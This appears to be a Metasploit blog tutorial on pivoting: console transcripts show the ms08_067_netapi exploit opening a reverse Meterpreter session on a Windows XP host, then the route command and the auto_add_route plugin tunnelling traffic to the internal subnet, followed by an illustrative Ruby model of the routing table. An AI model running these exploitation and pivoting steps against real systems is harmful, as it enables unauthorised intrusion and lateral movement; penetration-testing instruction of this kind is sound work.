Among the coolest features in Metasploit is the ability to tunnel through a Meterpreter session to the network on the other side. The route command in msfconsole sets this up, but it takes a bit of experience to get right.

[*] Meterpreter session 1 opened (10.1.1.52:4444 -> 10.1.1.118:1238)

meterpreter > run get_local_subnets
Local subnet: 10.1.1.0/255.255.255.0
meterpreter > background
msf exploit(ms08_067_netapi) > route add 10.1.1.0 255.255.255.0 1
msf exploit(ms08_067_netapi) > route print

Active Routing Table
====================

   Subnet             Netmask            Gateway
   ------             -------            -------
   10.1.1.0           255.255.255.0      Session 1

msf exploit(ms08_067_netapi) >

After running the above commands, any traffic sent to the 10.1.1.0 network will be tunnelled through the session. There is also a plugin that automatically adds a route for any previously unseen subnets when a new session opens up. Here is some example usage and output:

msf exploit(ms08_067_netapi) > load auto_add_route
[*] Successfully loaded plugin: auto_add_route
msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 10.1.1.52:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (NX)
[*] Triggering the vulnerability...
[*] Sending stage (725504 bytes)
[*] Meterpreter session 1 opened (10.1.1.52:4444 -> 10.1.1.118:1239)
[*] AutoAddRoute: Routing new subnet 10.1.1.0/255.255.255.0 through session 1

meterpreter > background
msf exploit(ms08_067_netapi) > route print

Active Routing Table
====================

   Subnet             Netmask            Gateway
   ------             -------            -------
   10.1.1.0           255.255.255.0      Session 1

msf exploit(ms08_067_netapi) >

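The routing behaviour in the two sessions above can be modelled in a few lines of Ruby. This is an added example, not code from the original post or from Metasploit: the names SessionRouteTable and demo_table are hypothetical, and the most-specific-netmask rule for overlapping routes is an assumption of the model.

```ruby
require 'ipaddr'

# Simplified model of a session routing table (illustration only, not
# Metasploit's implementation). Each route maps subnet/netmask -> session id.
class SessionRouteTable
  Route = Struct.new(:subnet, :netmask, :session)

  def initialize
    @routes = []
  end

  # Models `route add <subnet> <netmask> <session>`. The address is masked
  # first, so a host address inside an already-routed subnet is treated as
  # a duplicate and skipped (the "previously-unseen subnets" behaviour).
  def add(subnet, netmask, session)
    net = IPAddr.new("#{subnet}/#{netmask}").to_s
    return false if @routes.any? { |r| r.subnet == net && r.netmask == netmask }
    @routes << Route.new(net, netmask, session)
    true
  end

  # Session that would carry traffic to dest, or nil when no route matches
  # and the connection leaves directly from the local host.
  # Assumption: the most specific netmask wins when routes overlap.
  def session_for(dest)
    ip = IPAddr.new(dest)
    match = @routes
            .select { |r| IPAddr.new("#{r.subnet}/#{r.netmask}").include?(ip) }
            .max_by { |r| IPAddr.new(r.netmask).to_i }
    match && match.session
  end

  # Rows in the same column order as `route print`.
  def rows
    @routes.map { |r| [r.subnet, r.netmask, "Session #{r.session}"] }
  end
end

# Table matching the post's `route add 10.1.1.0 255.255.255.0 1`.
def demo_table
  table = SessionRouteTable.new
  table.add('10.1.1.0', '255.255.255.0', 1)
  table
end

if __FILE__ == $PROGRAM_NAME
  t = demo_table
  %w[10.1.1.200 10.1.2.5].each { |d| puts "#{d} -> #{t.session_for(d).inspect}" }
end
```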
The auto_add_route plugin is now available in the Metasploit trunk; ‘svn up’ to get it.
Source: Metasploit Blog